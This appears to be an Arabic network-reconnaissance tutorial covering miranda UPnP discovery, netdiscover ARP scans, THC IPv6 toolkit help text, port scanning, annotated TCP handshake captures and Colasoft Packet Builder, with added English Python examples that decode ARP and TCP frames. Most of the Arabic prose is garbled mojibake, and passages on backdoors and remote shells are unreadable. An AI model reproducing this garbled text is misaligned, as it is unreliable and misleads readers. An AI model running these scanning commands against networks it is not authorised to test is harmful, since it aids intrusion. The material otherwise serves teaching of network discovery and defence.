^^Ic ^j;Lj\ UPnP -Jl ^aj^a .6^Llx-aJl jLaC-VI jl^jV Aj£Luj!^J1 J^laJl <£jjai ^J-ajJa jl L£Ljj l^jJaxJ ^-a ^jLaS^)!! 6^^.VI J^^J (JjS ' ^ 
<£jLabGj l_lujL^JIj jlitill Jl iajj UPnP -J I cJ^-^ cjVI j^JI . jlitill s^&^j ^-^^^j ( > s^-^Jj cjVI j^JI

.Wi-Fi -J I U^LujV (la^j j^ll j jj^iiill djlaLd j jjj^alt£) I^jUjI^ 

^ l5^'j interactive mode <J*-^ (terminal) J miranda aJ& Jjji* <>- sbVl ^ J;!^ ^ 

(upnp>) 




i^VtS upnp S a-^J^ iaU* ^Haj (device) SjgV^I £^ t*Ui j msearch j^*^ 



upnp> msearch
Entering discovery mode for 'upnp:rootdevice', Ctl+C to stop...

SSDP reply message from 192.168.16.70:2869
XML file is located at http://192.168.16.70:2869/upnphost/udhisapi.dll
uid: 16cb31f6-3c07-446f-a847-9e94ff7bbecc
Device is running Microsoft-Windows/6.3 UPnP/1.0 UPnP-Device-Host/1.0



U. SERVER UPnPj * J j^JI £jh * Jj£ jjJI Ji« t> jkJI <> jjKII 4^ host info 0 ja«2JI 

.c_fl^JI jo CjUjkJI 2 r x^J ^ v^ .. n host get 0 
.host get 0 <^bl axj lJ^JI Jj^iau CjUjkJU <^IS Host summary 0 

netdiscover ■ 

<ii c*Ui ^ ^ jll Jc 'DHCP ^ V ^jII cjKi>ffl LJjJ rv>>hj AliiiSi CjIj^I ohl y> Netdiscover 

XP jl jo <c.jjudj djLd jlx-a j Ul ^ajujj StaVI oiA .^>3l j ARP J^j^ .Aj^LuJI cjI^jjuJI l-aLou^I Jc Uiajl J-^s 

.DHCP fil* c?t UtJ^ cr^ ^£1^1 CjKi.nlt J l^jli ULL. UB U£j <^ Jc 



~# netdiscover -help
Netdiscover 0.3-beta7 [Active/passive arp reconnaissance tool]
Written by: Jaime Penalba <jpenalbae@gmail.com>

Usage: netdiscover [-i device] [-r range | -l file | -p] [-s time] [-n node] [-c count] [-f] [-d] [-S] [-P] [-L]
  -i device: your network device
  -r range: scan a given range instead of auto scan. 192.168.6.0/24,/16,/8
  -l file: scan the list of ranges contained into the given file
  -p passive mode: do not send anything, only sniff
  -F filter: customize pcap filter expression (default: "arp")
  -s time: time to sleep between each arp request (miliseconds)
  -n node: last ip octet used for scanning (from 2 to 253)
  -c count: number of times to send each arp reques (for nets with packet loss)
  -f enable fastmode scan, saves a lot of time, recommended for auto
  -d ignore home config files for autoscan and fast mode
  -S enable sleep time supression betwen each request (hardcore mode)
  -P print results in a format suitable for parsing by another program
  -L in parsable output mode (-P), continue listening after the active scan is completed

If -r, -l or -p are not enabled, netdiscover will scan for common lan addresses.
~#



uj^i netdiscover j*VI ^M-^j ^ijj^ V jl aj^Luj $.1 jjuj tiL <1»jj^<J! CjI^jJJ! o^*A a ^ (j^j 



 Currently scanning: 172.23.31.0/16   |   Screen View: Unique Hosts

 97 Captured ARP Req/Rep packets, from 6 hosts.   Total size: 5820

   IP              At MAC Address      Count   Len    MAC Vendor
   172.16.11.9     00:90:27:b7:e9:3c   08      480    INTEL CORPORATION
   192.168.16.70   00:1e:ec:af:fb:65   43      2580   COMPAL INFORMATION (KUNSHAN) CO.,
   192.168.16.1    00:05:b4:04:78:b0   35      2100   Aceex Corporation
   192.168.16.71   00:30:67:0f:af:4f   09      540    BIOSTAR MICROTECH INT'L CORP.
   172.16.11.69    00:90:27:b7:e9:3c   01      060    INTEL CORPORATION
   172.16.11.105   00:90:27:b7:e9:3c   01      060    INTEL CORPORATION













(192.168.16.70 - 192.168.16.71 - 192.168.16.10) ^Vl ^jUJI ^ ^ ^ cA£^\\ <> a* ^ ^ ai\ Ua i^^U 
I^VIS (-r) ft^lkluL Ajjj ^t A<*u*\\ jUaj ^j^j <j£as



# netdiscover -i wlan0 -r 192.168.1.0/24   (Scan a class C network, to see which hosts are up)
# netdiscover -i wlan0 -r 10.0.0.0/8       (Scan a class A network, trying to find network addresses)



^ (*vs ill A)\ac c_a jjoj (cill a£jJo3I ^j^il j^xjII 
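The Python block below is an added example covering the arping and netdiscover sections above; it is not the page's own code and is not taken from arping or netdiscover. It builds and decodes Ethernet/ARP frames (RFC 826) from raw bytes and aggregates the senders seen in a passive capture into the IP / MAC / Count / Len / Vendor table that netdiscover prints. It also reports any IP claimed by more than one MAC, which is the conflict a defender reviewing such a table watches for. The OUI table, MAC addresses and sample frames are constructed for the demonstration (the vendor strings mirror the netdiscover output shown above).

```python
# Added example (not from the original text, and not code from arping or netdiscover): build
# and decode Ethernet/ARP frames (RFC 826), turn a passive capture into the host table
# netdiscover prints, and add the IP-to-MAC conflict check a defender would want.
import ipaddress
import struct
from collections import OrderedDict

ETH_P_ARP = 0x0806

# Small constructed OUI-to-vendor table; the real tools ship a full IEEE list.
OUI_VENDORS = {"00:1e:ec": "COMPAL INFORMATION (KUNSHAN) CO.,", "00:0c:29": "VMware, Inc.",
               "00:05:b4": "Aceex Corporation", "00:90:27": "INTEL CORPORATION"}


def mac_bytes(text: str) -> bytes:
    return bytes(int(x, 16) for x in text.split(":"))


def mac_str(raw: bytes) -> str:
    return ":".join("%02x" % b for b in raw)


def build_arp_frame(oper: int, sender_mac: str, sender_ip: str, target_mac: str, target_ip: str) -> bytes:
    """Ethernet II + ARP frame, padded to the 60-byte minimum exactly as it appears on the wire
    (which is why netdiscover's Len column grows by 60 per packet). oper 1 = request, 2 = reply."""
    eth_dst = b"\xff" * 6 if oper == 1 else mac_bytes(target_mac)
    eth = eth_dst + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, oper)
           + mac_bytes(sender_mac) + ipaddress.IPv4Address(sender_ip).packed
           + mac_bytes(target_mac) + ipaddress.IPv4Address(target_ip).packed)
    frame = eth + arp
    return frame + b"\x00" * max(0, 60 - len(frame))


def parse_arp(frame: bytes):
    """Return the ARP fields of an Ethernet/IPv4 ARP frame, or None for anything else."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, oper = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    body = frame[22:42]
    return {"oper": oper,
            "sender_mac": mac_str(body[0:6]), "sender_ip": str(ipaddress.IPv4Address(body[6:10])),
            "target_mac": mac_str(body[10:16]), "target_ip": str(ipaddress.IPv4Address(body[16:20]))}


def passive_inventory(frames):
    """Aggregate ARP senders into rows of IP, MAC, Count, Len, Vendor (netdiscover's table).
    Returns (rows, number of non-ARP frames skipped)."""
    rows, skipped = OrderedDict(), 0
    for frame in frames:
        p = parse_arp(frame)
        if p is None:
            skipped += 1
            continue
        key = (p["sender_ip"], p["sender_mac"])
        row = rows.setdefault(key, {"ip": p["sender_ip"], "mac": p["sender_mac"], "count": 0, "len": 0,
                                    "vendor": OUI_VENDORS.get(p["sender_mac"][:8], "unknown")})
        row["count"] += 1
        row["len"] += len(frame)
    return list(rows.values()), skipped


def ip_conflicts(rows) -> list:
    """IPs claimed by more than one MAC: an ARP spoofing or duplicate-address indicator."""
    macs = {}
    for r in rows:
        macs.setdefault(r["ip"], set()).add(r["mac"])
    return sorted(ip for ip, m in macs.items() if len(m) > 1)


def sample_frames() -> list:
    """Constructed capture (not from the page): 8 requests from a Compal host, 3 replies from
    the gateway, one non-ARP IPv4 frame, and one reply claiming the Compal host's IP from a
    VMware MAC, so the conflict check has something to find."""
    frames = []
    for _ in range(8):
        frames.append(build_arp_frame(1, "00:1e:ec:af:fb:65", "192.168.16.70",
                                      "00:00:00:00:00:00", "192.168.16.1"))
    for _ in range(3):
        frames.append(build_arp_frame(2, "00:05:b4:04:78:b0", "192.168.16.1",
                                      "00:1e:ec:af:fb:65", "192.168.16.70"))
    frames.append(b"\xff" * 6 + mac_bytes("00:1e:ec:af:fb:65") + struct.pack("!H", 0x0800) + b"\x00" * 46)
    frames.append(build_arp_frame(2, "00:0c:29:0d:a3:a4", "192.168.16.70",
                                  "00:05:b4:04:78:b0", "192.168.16.1"))
    return frames


if __name__ == "__main__":
    rows, skipped = passive_inventory(sample_frames())
    print("%-15s %-18s %5s %6s  %s" % ("IP", "At MAC Address", "Count", "Len", "MAC Vendor"))
    for r in rows:
        print("%-15s %-18s %5d %6d  %s" % (r["ip"], r["mac"], r["count"], r["len"], r["vendor"]))
    print("skipped non-ARP frames:", skipped, "| IPs with conflicting MACs:", ip_conflicts(rows))
```

Keying the table on the (IP, MAC) pair rather than on the IP alone is what makes the conflict check possible: a single IP that shows up under two rows is exactly the case a passive listener should surface rather than silently merge.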

passive_discovery6 ■ 

.IPv6 ojj^ ^ sj^Vl c> ^> u-^i c> .HC-IPV6-ATTACK-TOOLKIT ^» <> lsj^ *W 



# passive_discovery6
passive_discovery6 v2.0 (c) 2012 by van Hauser / THC <vh@thc.org> www.thc.org

Syntax: passive_discovery6 [-Ds] [-m maxhop] [-R prefix] interface [script]

Options:
  -D         do also dump destination addresses (does not work with -m)
  -s         do only print the addresses, no other output
  -m maxhop  the maximum number of hops a target which is dumped may be away.
             0 means local only, the maximum amount to make sense is usually 5
  -R prefix  exchange the defined prefix with the link local prefix

Passivly sniffs the network and dump all client's IPv6 addresses detected.
Note that in a switched environment you get better results when additionally
starting parasite6, however this will impact the network.

If a script name is specified after the interface, it is called with the
detected ipv6 address as first and the interface as second option.



thcping6 ■ 

Sjjill ^ 1 A> n , n \« ICMPv6 tus-i thcping6 f HC-IPV6-ATTACK-TOOLKIT <> M 

thcping6 <options> <interface> <source-ipv6> <destination-ipv6> 



3.3 CHECK FOR OPEN PORTS



jt U&aJ ^jaJ j tcJl^VI <xjIS tSLJ <jVl 

^Uaill ^^ic fallal t CjLq^lSI c _^& Ui ^j^j j 4a. j^Lg iat_L<Jt ^ ^) ai^j j& (port scanning) i^a]l o-*aai 4jUr. ^ c ^jojLojV1 t a^-lt 

jt 6<cU]a3l j ( (FTP)**— d ^^t cJ^ J JJ^V^ ^L>^ <-! jfi jJJ^^H l^J ^ajlj S^Aa-a A aqa j\ Al^a j <La,laJt m < V^lm^lt 
Jjijuj ^^ic t . u^J L_fl jjoj (JA ^.JJ^ ^ <-L>^ (J^-^Jt i^t J^J 4-^ ji^^ t *°^^ * CS"^ (J^ 3 ^ (J^ 1 ialAxJt (J^aa^ .L-JJjlt '" iLa 9 ^J^5J 

jt l^-Gj ialixJt/cijljjjJt . jj J£ 6^ ja. iflliall (65<535-0) 65^536 .iii^lt liA ^viun ^ill c_±jj3t ^U. 
t> s^liiuuJt ^U^aJt t^Uituser datagram protocol (UDP) ^transmission control protocol (TCP) H 

.iiiJt Cj^aJ ^t diVl^iVt <at-nL jt CjjjJt/iiiJt t^A 

4 jl^aJt ti^ (j-a ^a^ii3 JjJaflt ojjj^ 1 lllaxJ t^A .4_a. jliixJt jt A * laJLuiASt Cjljjji3t/iaLL<Jt ^^Jb U» Ai^sLxJ jj jj;^^ ^^-^■^ Q^^^ L>^ 

.AlLia>l ^ ^ A-iiia <J ja. (JjJaflt \ ilA Jj^ '(^^t j 

^jj^jjC. Alajoat jj <!LUa dbaj Nmap .Nmapj^^ < — * ^ tialL<Jt (j-^aa^ ptja-V Ja^S 6^a.t j <Ljoj j jUaJ (jt Ale ^jl£ tit 

aj\ ft jit ><j? K tdli ^ Uj L >AiJ CjUjJjj ^ ^AxJt ^ Cinj . www.insecure.org ^ uj^ "jj^j^" 

.(terminal) Aja^Ut (jy^ia ijp> \ $ ^ laJLujt Uiajt ^Luj l_a jjoj U^3j '(GUI) j^^^ ^ laJLuiAlt <^a.tj ^ Nmap cJ^*^ (ja^uJt 

Ls lc ^UucVt J-atjVt jiaxw at iklujt ^alsu Q\ UjIc ( . la>J tiUJ ^JjlLoiJ t jJJa 4_L^aj£3tj ^j-oVt ^Uaj ^ ^t^a. ^aA (jjill ^j^alauu^Vt 

ot^Vt ^t^aJLoat lit jt .t.Aa. jnjmj ^^)3t dljau] ^dt jVt ^ajuj ^t^aJLujt ^jl ^j-d (jj^ nij La LJlc. ^jjjUlt (jjoij .■'S-Ld jjuj^)3t ^^aJjaixJt <^a.t j 

tjVt jk^^ 

. JUlt ^jiauJt ^t ciL 3 >^U\I dit jl^JI ^i^ ^jjj ^ULJt ^jj^j automationj Scripting .^J^^ 
^Jajuj J- La jj jJi^I] 4^I^JjujI ^jl ^1 . IjJJ^ Jjoijll ^a^JjaixJ! <g_a.lj jj^lkluij 4_L^aj£3l ^3lc ^1^. ^aA (JJ^I (JjAjII ~^"» a
(jj^J L_fl jjoJ a fljl h jll ^Saa A ^ L— Ll^ iAaJ Ld Ij^U 6(j£-<Ui jJjljjjaJl lifc ^jl (j-G ^^1 CS"^* .^-^-^l J (J^ ^ J ( ♦ ^^1 

j-gI jVI jiajuj) J^JI ^ . (backdoor) I J j^a jll jl J^l ^ ^ admin cjU^^s J jj^*JI is ^±i jll cila^A 

^ajujj el li^ (remote shell) ,J * J CP- ^>*l j*^l ^ ajuj *\ ^52 * >1 W 'W^* l!-**^ (^1 ^>*l jVI ji=^ jl lB-^j^I cJ*^ ,j*^ j 

(j^aLiJ! dll j^Vl (j* J*l jVI jia^J ^isu .1 V^lm^l jl^aJl ^^ic IaJjAjj ^aJ tc*L (j-aLkll JJ Jjj^l j^^- ^^Jc jxil jVI Jbk^U 

^ ^Jl ^xJl / alia a ^cjllj ^CJJJ 1 ^ > ^jj ial_L<J| ^ alia a ^1 jjl ,L_fl^Jl liLali 1 ^jlc> Jj^aJ ^^jll AjL^JjujVI ^ 

O^aai ^1 4Ja^!la ^jj . jl^aJI ^ 4a UDP J> TCP ^J^J <> jiaaJt JSlliJI <>aai ;4ia jsIa 



THE THREE-WAY HANDSHAKE 




[Figure: the three-way handshake between client 10.0.0.2:62000 and server 10.0.0.3:21]




CjUiL^ dj^iill jU^iml J^U ^> fcdli Jxij l^jli 4 TCP 
1^ <£jt^ ^ ^iUxJI ^ .(The Three - way handshake) 

Jjjj Lalk. (jJj^al<Jl <Jj^J (J^i^ /Ml ^JXJ Jj3 JSVI ^5^) Aj^I^J 
c fljl^Jl ^-<ft.>.>iJ (^ilLall '^^1 ^ ; lilaJ j L_fljlg_II iafliiti tUi ^j^>^ ui ^ Cj^jII 

^ C5 ill<JI jli 4<!UJI oi^ ^ Ax^xi tillx-a tU^^" J jllU 

. ^UslxJ1£ 4j^l^<Jl <L^al j>J CjUi jIslxJI ^Q^j ^jjS jUl 

^gjllill jj jjj^ll ^11 (J jVI JJ jJfx^ll -laJJJ .■'UjUui ^jUr> (J!^. £yz ^jjjAij 

^1^1 jj* j±i*£l\ jl£ lil .^^<i iiid ^aj ^1 SYN J^j] (j&j^ 3 
.SYN/ACK ^> JL-jW ^™ .(listing) ^UL,VI ^jj 

^> ^ .SYN/ACK JjV j^j^l JW^U^ 

■ C3 T .-. ^ cJ^*^ ^ > J ^ Jj^l J^l (Jj jl 6<Jaii3l Aic. .ACK 

g^l Jl^JI U JUj c? L^Vl sJUJI jli ."c-il^JI Jli." 6 ^l Ultia ^ 

Jlc jx." Jlaj cJLil^jl Jaiill ^ill C5 iJiall .SYN ^> J-JJ 

<xi Jlft ^aij lAjjxjj ^li C5 i^aVI Jj^al^l j SYN/ACK ^-O^ 

RST jl FIN ^> J^-jl ^ ^ J^VI J!tel & .ACK 



(ESTABLISHING A TCP CONNECTION)
^jujI ^ ^jjal jll (jxi .(The Three way handshake) ciiUiU^ dj^lSlI ^LujI TCP Jl-^l o*±^ ^ tlLLoj Ll^SLj L£ 

.4_LoUJJ dj| j^>^ ^ (JIj^jVI ^Ujdj] jl^jj ^JJ (jl N Nt ^31 ^-J jLujVI 

Source: http://support.microsoft.com/kb/172983



t*jC^>J^ SYN .(TCP 



- TCP J^l gyiuit J^ui j^laj 

Frame 1 ■ 

.S.) SYN p>1I lUj^ <NTW3 0^1 * J jVl jU»yi ujj^ ^ 



J » nl i. nil ^jVI c> 6 jW^ .(synchronize sequence numbers) y& J] aIujjj ^3 <J***J1 
41^13 .^L3I J) l^UJ ^ ^Ij .[1,8221821+1=8221822] g^j <(ISN {Initial Number Sequence}) 

Maximum Segment Size (MSS) jW^ .<>»*JI 6 ^ J^Ld! ^15 J > ^UJ! j J^l jjj JU^il 

lUj-JI maximum segment size m ^ .(len:4) length c> ^ ls^j '^y* 2 <£^' 

.The Three way handshake *jLc t> JjVl * >JI ja li* (ACK: 0) J) ^ ACK J^JI ^ Jj^J! 

1   2.0785   NTW3 --> BDC3   TCP ....S., len: 4, seq: 8221822-8221825, ack: 0, win: 8192, src: 1037 dst: 139 (NBT Session)   NTW3 --> BDC3 IP

TCP: ....S., len: 4, seq: 8221822-8221825, ack: 0, win: 8192, src: 1037 dst: 139 (NBT Session)
TCP: Source Port = 0x040D
TCP: Destination Port = NETBIOS Session Service
TCP: Sequence Number = 8221822 (0x7D747E)
TCP: Acknowledgement Number = 0 (0x0)
TCP: Data Offset = 24 (0x18)
TCP: Reserved = 0 (0x0000)
TCP: Flags = 0x02 : ....S.
    TCP: ..0..... = No urgent data
    TCP: ...0.... = Acknowledgement field not significant
    TCP: ....0... = No Push function
    TCP: .....0.. = No Reset
    TCP: ......1. = Synchronize sequence numbers
    TCP: .......0 = No Fin
TCP: Window = 8192 (0x2000)
TCP: Checksum = 0xF213
TCP: Urgent Pointer = 0 (0x0)
TCP: Options
    TCP: Option Kind (Maximum Segment Size) = 2 (0x2)
    TCP: Option Length = 4 (0x4)
    TCP: Option Value = 1460 (0x5B4)
TCP: Frame Padding

00000: 02 60 8C 9E 18 8B 02 60 8C 3B 85 C1 08 00 45 00
00010: 00 2C 0D 01 40 00 80 06 E1 4B 83 6B 02 D6 83 6B
00020: 02 D3 04 0D 00 8B 00 7D 74 7E 00 00 00 00 60 02
00030: 20 00 F2 13 00 00 02 04 05 B4 20 20



Frame 2 ■ 

c>(SYN) cfe r^Jt *>ll Iaa ^ .(.TCP. A.. S) fcUaill \* J* SYNj ACK J- <BDC3 ^ ^ jU»yi <j 
JjojjI ^ilt SYN JjuoLonll ^jll bjuc j& L_Akll li* . J^**^ Jj(ACK) s-^ \ > >*\\ J^jj ^UJI <£jS jll ^ ,<>»lj2ll 

.(8221823) ^ ^ Uilk c> .(Acknowledgement number) ACK Ls ^. V&j aJI \SL±* Jj*JI <> 
. Jj^xJ) i^jL^j) SYN ACK (J Jj**il Ja2a CjUjI Acknowledgement number 
2   2.0786   BDC3 --> NTW3   TCP .A..S., len: 4, seq: 1109645-1109648, ack: 8221823, win: 8760, src: 139 (NBT Session) dst: 1037   BDC3 --> NTW3 IP

TCP: .A..S., len: 4, seq: 1109645-1109648, ack: 8221823, win: 8760, src: 139 (NBT Session) dst: 1037
TCP: Source Port = NETBIOS Session Service
TCP: Destination Port = 0x040D
TCP: Sequence Number = 1109645 (0x10EE8D)
TCP: Acknowledgement Number = 8221823 (0x7D747F)
TCP: Data Offset = 24 (0x18)
TCP: Reserved = 0 (0x0000)
TCP: Flags = 0x12 : .A..S.
    TCP: ..0..... = No urgent data
    TCP: ...1.... = Acknowledgement field significant
    TCP: ....0... = No Push function
    TCP: .....0.. = No Reset
    TCP: ......1. = Synchronize sequence numbers
    TCP: .......0 = No Fin
TCP: Window = 8760 (0x2238)
TCP: Checksum = 0x012D
TCP: Urgent Pointer = 0 (0x0)
TCP: Options
    TCP: Option Kind (Maximum Segment Size) = 2 (0x2)
    TCP: Option Length = 4 (0x4)
    TCP: Option Value = 1460 (0x5B4)
TCP: Frame Padding

00000: 02 60 8C 3B 85 C1 02 60 8C 9E 18 8B 08 00 45 00
00010: 00 2C 5B 00 40 00 80 06 93 4C 83 6B 02 D3 83 6B
00020: 02 D6 00 8B 04 0D 00 10 EE 8D 00 7D 74 7F 60 12
00030: 22 38 01 2D 00 00 02 04 05 B4 20 20



Frame 3

In the third frame NTW3 sends a segment with only the ACK flag set (TCP: .A....). Its Acknowledgement Number is BDC3's sequence number plus one (1109646), confirming receipt of the SYN/ACK, and its own sequence number has moved to 8221823. This completes the three-way handshake: the connection is now established and data can flow in both directions.

3   2.787   NTW3 --> BDC3   TCP .A...., len: 0, seq: 8221823-8221823, ack: 1109646, win: 8760, src: 1037 dst: 139 (NBT Session)   NTW3 --> BDC3 IP

TCP: .A...., len: 0, seq: 8221823-8221823, ack: 1109646, win: 8760, src: 1037 dst: 139 (NBT Session)
    TCP: Source Port = 0x040D
    TCP: Destination Port = NETBIOS Session Service
    TCP: Sequence Number = 8221823 (0x7D747F)
    TCP: Acknowledgement Number = 1109646 (0x10EE8E)
    TCP: Data Offset = 20 (0x14)
    TCP: Reserved = 0 (0x0000)
    TCP: Flags = 0x10 : .A....
        TCP: ..0..... = No urgent data
        TCP: ...1.... = Acknowledgement field significant
        TCP: ....0... = No Push function
        TCP: .....0.. = No Reset
        TCP: ......0. = No Synchronize
        TCP: .......0 = No Fin
    TCP: Window = 8760 (0x2238)
    TCP: Checksum = 0x18EA
    TCP: Urgent Pointer = 0 (0x0)
    TCP: Frame Padding

00000: 02 60 8C 9E 18 8B 02 60 8C 3B 85 C1 08 00 45 00   .`.....`.;....E.
00010: 00 28 0E 01 40 00 80 06 E0 4F 83 6B 02 D6 83 6B   .(..@....O.k...k
00020: 02 D3 04 0D 00 8B 00 7D 74 7F 00 10 EE 8E 50 10   .......}t.....P.
00030: 22 38 18 EA 00 00 20 20 20 20 20 20               "8....



TCP communication flags

The TCP header carries a set of one-bit control flags that describe what each segment is doing and drive the state of the connection. The sender sets the flags that apply to the segment, and the receiver reacts according to the rules of the protocol. The flags are:

SYN (Synchronize): opens a connection. It announces a new initial sequence number and is set only in the first segment sent by each side of the handshake.
ACK (Acknowledgement): indicates that the Acknowledgement Number field is valid, i.e. the sender confirms receipt of everything up to that number. Once a connection is established, every segment carries ACK.
PSH (Push): asks the receiving host to hand the buffered data to the application immediately instead of waiting for more.
URG (Urgent): indicates that the data pointed to by the Urgent Pointer must be processed before the rest of the segment.
FIN (Finish): the sender has no more data to send and wants to close its side of the connection.
RST (Reset): aborts the connection. A host sends it when a segment arrives that belongs to no connection, for example a SYN to a port on which nothing is listening.

A SYN scan (described later in this section) needs only the SYN, ACK and RST flags; the other flags are used by the remaining scan types during the enumeration process.
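The handshake frames above can be checked mechanically. The following Python script is an added example, not part of the original capture or of any tool shown on this page: it takes the three frames' bytes as transcribed from the hex dumps above, parses Ethernet/IPv4/TCP, verifies both the IP and the TCP checksum, names the flags with the bit values of the table, and confirms the sequence/acknowledgement arithmetic (each acknowledgement number equals the peer's sequence number plus one).

```python
# Decoding the three handshake frames above (NTW3 <-> BDC3).
# Added example, not part of the original capture tooling: the hex below is
# transcribed from the page's own dumps (Ethernet padding left in); the
# parser, checksum check and handshake check are illustrative code.
import struct
from dataclasses import dataclass
from typing import List, Optional

FRAME_HEX = [
    # Frame 1: NTW3 -> BDC3, SYN
    "02 60 8C 9E 18 8B 02 60 8C 3B 85 C1 08 00 45 00 "
    "00 2C 0D 01 40 00 80 06 E1 4B 83 6B 02 D6 83 6B "
    "02 D3 04 0D 00 8B 00 7D 74 7E 00 00 00 00 60 02 "
    "20 00 F2 13 00 00 02 04 05 B4 20 20",
    # Frame 2: BDC3 -> NTW3, SYN/ACK
    "02 60 8C 3B 85 C1 02 60 8C 9E 18 8B 08 00 45 00 "
    "00 2C 5B 00 40 00 80 06 93 4C 83 6B 02 D3 83 6B "
    "02 D6 00 8B 04 0D 00 10 EE 8D 00 7D 74 7F 60 12 "
    "22 38 01 2D 00 00 02 04 05 B4 20 20",
    # Frame 3: NTW3 -> BDC3, ACK
    "02 60 8C 9E 18 8B 02 60 8C 3B 85 C1 08 00 45 00 "
    "00 28 0E 01 40 00 80 06 E0 4F 83 6B 02 D6 83 6B "
    "02 D3 04 0D 00 8B 00 7D 74 7F 00 10 EE 8E 50 10 "
    "22 38 18 EA 00 00 20 20 20 20 20 20",
]

# TCP flag bits in the low byte of the data-offset/flags word.
FLAG_BITS = {"FIN": 0x01, "SYN": 0x02, "RST": 0x04, "PSH": 0x08, "ACK": 0x10, "URG": 0x20}


def flag_names(flags: int) -> List[str]:
    return [name for name, bit in FLAG_BITS.items() if flags & bit]


def ones_complement_sum(data: bytes) -> int:
    """16-bit one's-complement sum (RFC 1071). Over a header that still
    contains its checksum field the result is 0xFFFF when the checksum is right."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total


@dataclass
class TcpSegment:
    src: str
    dst: str
    sport: int
    dport: int
    seq: int
    ack: int
    flags: int
    window: int
    mss: Optional[int]
    ip_ok: bool
    tcp_ok: bool


def parse_frame(frame: bytes) -> TcpSegment:
    """Ethernet II -> IPv4 -> TCP, with both checksums verified."""
    if frame[12:14] != b"\x08\x00":
        raise ValueError("not an IPv4 frame")
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    ip = ip[: struct.unpack("!H", ip[2:4])[0]]  # cut the Ethernet padding
    if ip[9] != 6:
        raise ValueError("not TCP")
    tcp = ip[ihl:]
    sport, dport, seq, ack, off_flags, window = struct.unpack("!HHIIHH", tcp[:16])
    data_off = (off_flags >> 12) * 4
    pseudo = ip[12:20] + struct.pack("!BBH", 0, 6, len(tcp))  # TCP pseudo-header
    mss, opts, i = None, tcp[20:data_off], 0
    while i < len(opts) and opts[i] != 0:          # kind 0 = End of Option List
        if opts[i] == 1:                            # kind 1 = NOP, one byte
            i += 1
            continue
        if opts[i] == 2 and opts[i + 1] == 4:       # kind 2 = Maximum Segment Size
            mss = struct.unpack("!H", opts[i + 2 : i + 4])[0]
        i += max(opts[i + 1], 2)                    # never loop on a zero length
    return TcpSegment(
        src=".".join(map(str, ip[12:16])), dst=".".join(map(str, ip[16:20])),
        sport=sport, dport=dport, seq=seq, ack=ack, flags=off_flags & 0x3F,
        window=window, mss=mss,
        ip_ok=ones_complement_sum(ip[:ihl]) == 0xFFFF,
        tcp_ok=ones_complement_sum(pseudo + tcp) == 0xFFFF,
    )


def decode_all() -> List[TcpSegment]:
    return [parse_frame(bytes.fromhex(h)) for h in FRAME_HEX]


def check_handshake(segs: List[TcpSegment]) -> bool:
    """SYN, SYN/ACK, ACK with the sequence/acknowledgement arithmetic the text describes."""
    syn, synack, ack = segs
    return (
        flag_names(syn.flags) == ["SYN"]
        and set(flag_names(synack.flags)) == {"SYN", "ACK"}
        and flag_names(ack.flags) == ["ACK"]
        and (synack.src, synack.sport) == (syn.dst, syn.dport)
        and synack.ack == syn.seq + 1          # server acknowledges client ISN + 1
        and ack.seq == syn.seq + 1             # client's next sequence number
        and ack.ack == synack.seq + 1          # client acknowledges server ISN + 1
    )


if __name__ == "__main__":
    for n, s in enumerate(decode_all(), 1):
        print(n, s.src, s.sport, "->", s.dst, s.dport, flag_names(s.flags),
              "seq", s.seq, "ack", s.ack, "ip_ok", s.ip_ok, "tcp_ok", s.tcp_ok)
    print("handshake valid:", check_handshake(decode_all()))
```

Both checksums verify for all three frames, which is a useful sanity check whenever a capture has been retyped by hand: a single wrong hex digit in the dump shows up as ip_ok or tcp_ok being False.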
CREATE CUSTOM PACKETS USING TCP FLAGS

Source: http://www.colasoft.com

Colasoft Packet Builder is a tool for building custom network packets and sending them onto the network. Since every field of a packet can be set by hand, including the TCP flags, it is used to craft the kinds of probe discussed in this section (SYN, SYN/ACK, FIN, Xmas and NULL combinations), to test how firewalls and intrusion detection systems react to them, and to simulate attacks.

A packet can be created and edited in three views: the Decode Editor (a field-by-field view of every protocol layer), the Hex Editor and the ASCII editor. Colasoft Packet Builder can then send the finished packets out of a selected adapter or export them to a file for later use. The templates it offers are Ethernet Packet, ARP Packet, IP Packet and TCP Packet.

Steps:

1. Start Colasoft Packet Builder; the main window appears as below.

[Figure: Colasoft Packet Builder main window. Menus: File, Edit, Send, Help. Toolbar: Import, Export, Add, Insert, Copy, Paste, Delete, Move Up, Move Down, Checksum, Send, Send All, Adapter, About. Panes: Decode Editor, Packet List (columns No., Delta Time, Source, Destination), Hex Editor.]
2. Click Adapter and, in the Select Adapter dialog, choose the network interface the packets will be sent from. The dialog shows the adapter's details (Physical Address, Link Speed, Max Frame Size, IP Address, Default Gateway and Adapter Status) so you can confirm it is the right interface.

[Figure: Select Adapter dialog. Adapter: Realtek PCIe GBE Family Controller; Link Speed 100.0 Mbps; Max Frame Size 1500 bytes; IP Address 192.168.16.70/255.255.255.0; Default Gateway 192.168.16.1; Adapter Status Operational.]



3. Click Add or Insert to create a packet. Add appends the new packet at the end of the Packet List; Insert places it in front of the currently selected packet. In the Add Packet dialog choose Select Template: TCP Packet, set the Delta Time (the delay before this packet is sent, 0.1 second by default) and click OK.

[Figure: Add Packet dialog with Select Template: TCP Packet and Delta Time: 0.1 Second; OK, Cancel and Help buttons.]




4. After you click OK the new packet appears in the Packet List. Colasoft Packet Builder shows its decoded fields in the Decode Editor and its raw bytes in the Hex Editor; edit either view (a change in one is reflected in the other) to set the MAC and IP addresses, ports, sequence numbers and the TCP flags the packet should carry. The Checksum button on the toolbar recomputes the IP and TCP checksums after the fields have been changed.

